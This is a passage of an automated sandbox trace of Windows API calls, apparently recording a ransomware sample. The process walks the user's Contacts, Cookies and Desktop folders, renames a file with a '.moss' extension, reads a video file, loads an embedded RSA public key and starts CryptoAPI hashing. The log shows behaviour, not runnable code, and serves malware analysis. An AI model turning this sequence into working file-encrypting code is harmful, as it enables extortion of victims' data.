Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.005] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.005] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.005] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.005] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x490) returned 0x3b447b0 [0169.005] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.005] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.005] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44c48 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44ff0 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc18 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45038 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc30 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc60 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc78 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0xd23a00 [0169.006] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b48820 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a40 [0169.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc60 | out: hHeap=0xcd0000) returned 1 [0169.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc78 | out: hHeap=0xcd0000) returned 1 [0169.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.006] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a40 | out: hHeap=0xcd0000) returned 1 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc78 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbc60 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.006] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613670 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc78 | out: hHeap=0xcd0000) returned 1 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc60 | out: hHeap=0xcd0000) returned 1 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.007] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.007] GetCurrentThreadId () returned 0x324 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd31790 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.007] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.008] GetCurrentThreadId () returned 0x324 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.008] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.008] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc60 [0169.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc78 [0169.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc48 [0169.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.009] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.010] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbcd8 [0169.010] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.010] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.010] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.010] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.010] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.010] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.010] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.011] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.011] CloseHandle (hObject=0x664) returned 1 [0169.019] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.019] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.019] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.moss")) returned 1 [0169.022] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0169.022] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0169.022] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0169.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c768 [0169.023] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0169.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.023] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0169.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45038 [0169.023] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0169.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0169.023] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0169.023] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0169.023] PathFindFileNameW (pszPath="") returned="" [0169.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0169.025] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0169.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362c768 [0169.025] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0169.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.025] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0169.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45038 [0169.025] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0169.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0169.026] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0169.026] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0169.026] PathFindFileNameW (pszPath="") returned="" [0169.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe8a11780, ftLastAccessTime.dwHighDateTime=0x1d69ad4, ftLastWriteTime.dwLowDateTime=0xe8a11780, ftLastWriteTime.dwHighDateTime=0x1d69ad4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0169.026] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe8a11780, ftLastAccessTime.dwHighDateTime=0x1d69ad4, ftLastWriteTime.dwLowDateTime=0xe8a11780, ftLastWriteTime.dwHighDateTime=0x1d69ad4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.026] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8466a20, ftCreationTime.dwHighDateTime=0x1d5e0bf, ftLastAccessTime.dwLowDateTime=0xeef9aa10, ftLastAccessTime.dwHighDateTime=0x1d5dcad, ftLastWriteTime.dwLowDateTime=0xeef9aa10, ftLastWriteTime.dwHighDateTime=0x1d5dcad, nFileSizeHigh=0x0, nFileSizeLow=0x165cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5DnktQKC1zi5mnZO.mkv", cAlternateFileName="5DNKTQ~1.MKV")) returned 1 [0169.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.027] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5DnktQKC1zi5mnZO.mkv") returned=".mkv" [0169.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5DnktQKC1zi5mnZO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5dnktqkc1zi5mnzo.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.027] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=91595) returned 1 [0169.027] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.032] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x165a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.032] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.034] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.034] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x165cb, lpOverlapped=0x0) returned 1 [0169.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.035] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.036] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.037] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.038] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.038] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.038] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.038] GetLastError () returned 0x0 [0169.038] SetLastError (dwErrCode=0x0) [0169.038] GetLastError () returned 0x0 [0169.038] SetLastError (dwErrCode=0x0) [0169.038] GetLastError () returned 0x0 [0169.038] SetLastError (dwErrCode=0x0) [0169.038] GetLastError () returned 0x0 [0169.038] SetLastError (dwErrCode=0x0) [0169.038] GetLastError () returned 0x0 [0169.038] SetLastError (dwErrCode=0x0) [0169.038] GetLastError () returned 0x0 [0169.038] SetLastError (dwErrCode=0x0) [0169.038] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] GetLastError () returned 0x0 [0169.039] SetLastError (dwErrCode=0x0) [0169.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.039] GetLastError () returned 0x0 [0169.040] SetLastError (dwErrCode=0x0) [0169.040] GetLastError () returned 0x0 [0169.040] SetLastError (dwErrCode=0x0) [0169.040] GetLastError () returned 0x0 [0169.040] SetLastError (dwErrCode=0x0) [0169.040] GetLastError () returned 0x0 [0169.040] SetLastError (dwErrCode=0x0) [0169.040] GetLastError () returned 0x0 [0169.040] SetLastError (dwErrCode=0x0) [0169.040] GetLastError () returned 0x0 [0169.040] SetLastError (dwErrCode=0x0) [0169.040] GetLastError () returned 0x0 [0169.040] 